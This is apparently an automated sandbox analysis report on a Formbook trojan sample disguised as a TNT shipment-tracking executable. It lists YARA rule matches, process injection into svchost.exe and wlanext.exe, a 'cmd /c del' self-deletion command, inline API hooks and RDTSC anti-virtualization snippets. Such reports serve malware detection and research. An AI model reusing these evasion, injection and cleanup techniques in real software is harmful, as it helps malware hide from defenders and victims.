          Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.3861610506.0000000010C89000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: TNT AWB TRACKING DETAILS.exe PID: 7420, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 7524, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: wlanext.exe PID: 7568, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@304/1@12/5
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_006F3355 memset,GetCurrentProcess,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,4_2_006F3355
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0046CB5F OleInitialize,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoInitializeSecurity,_wcslen,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0046CB5F
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeFile created: C:\Users\user\AppData\Local\Temp\antholiteJump to behavior
          Source: TNT AWB TRACKING DETAILS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: TNT AWB TRACKING DETAILS.exeReversingLabs: Detection: 52%
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeFile read: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: msdart.dllJump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: TNT AWB TRACKING DETAILS.exeStatic file information: File size 1135963 > 1048576
          Source: Binary string: wntdll.pdbUGP source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1449263354.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1448562285.0000000004550000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1450733761.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508845301.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508845301.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1452328610.0000000003200000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.3839397087.0000000003A3E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1510180588.00000000036EF000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.3839397087.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1508121602.000000000353E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1449263354.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1448562285.0000000004550000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1450733761.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508845301.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508845301.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1452328610.0000000003200000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000004.00000002.3839397087.0000000003A3E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1510180588.00000000036EF000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.3839397087.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1508121602.000000000353E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: svchost.exe, 00000002.00000003.1507427933.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508246439.0000000002BE0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1507541868.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000004.00000002.3831257030.00000000006F0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3861185504.000000001040F000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3844546010.0000000003DEF000.00000004.10000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3834313158.00000000032D1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3861185504.000000001040F000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3844546010.0000000003DEF000.00000004.10000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3834313158.00000000032D1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: svchost.exe, 00000002.00000003.1507427933.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508246439.0000000002BE0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1507541868.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.3831257030.00000000006F0000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
          Source: TNT AWB TRACKING DETAILS.exeStatic PE information: real checksum: 0xa961f should be: 0x119557
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041F18F pushfd ; ret 2_2_0041F190
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416A48 push ecx; ret 2_2_00416A4A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E462 push C7DC0245h; retf 2_2_0040E46B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D4D2 push eax; ret 2_2_0041D4D8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D4DB push eax; ret 2_2_0041D542
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D485 push eax; ret 2_2_0041D4D8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D53C push eax; ret 2_2_0041D542
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E5FF push es; ret 2_2_0041E600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041774B push edi; retf 2_2_00417755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340225F pushad ; ret 2_2_034027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034027FA pushad ; ret 2_2_034027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx2_2_034309B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340283D push eax; iretd 2_2_03402858
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340135E push eax; iretd 2_2_03401369
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384EB02 push esp; retn 0000h2_2_0384EB03
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384EB1E push esp; retn 0000h2_2_0384EB1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E9B5 push esp; retn 0000h2_2_0384EAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1BEB1E push esp; retn 0000h3_2_0B1BEB1F
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1BEB02 push esp; retn 0000h3_2_0B1BEB03
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1BE9B5 push esp; retn 0000h3_2_0B1BEAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_10C749B5 push esp; retn 0000h3_2_10C74AE7
          Source: C:\Windows\explorer.exeCode function: 3_2_10C74B02 push esp; retn 0000h3_2_10C74B03
          Source: C:\Windows\explorer.exeCode function: 3_2_10C74B1E push esp; retn 0000h3_2_10C74B1F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0070003D push ecx; ret 4_2_00700050
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038A225F pushad ; ret 4_2_038A27F9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038A27FA pushad ; ret 4_2_038A27F9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038D09AD push ecx; mov dword ptr [esp], ecx4_2_038D09B6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038A283D push eax; iretd 4_2_038A2858
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038A1368 push eax; iretd 4_2_038A1369
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030EF18F pushfd ; ret 4_2_030EF190

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xEA
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeAPI/Special instruction interceptor: Address: 3F3CAC4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF90818D324
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF908190774
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF908190154
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF90818D8A4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF90818D324
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF908190774
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF90818D944
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF90818D504
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF90818D544
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF908190154
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF90818D8A4
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 30D9904 second address: 30D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 30D9B7E second address: 30D9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9784Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 875Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 884Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeWindow / User API: threadDelayed 9757Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-88126
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeAPI coverage: 3.7 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.0 %
          Source: C:\Windows\SysWOW64\wlanext.exeAPI coverage: 1.8 %
          Source: C:\Windows\explorer.exe TID: 7948Thread sleep count: 9784 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7948Thread sleep time: -19568000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7948Thread sleep count: 157 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7948Thread sleep time: -314000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 7892Thread sleep count: 215 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 7892Thread sleep time: -430000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 7892Thread sleep count: 9757 > 30Jump to behavior
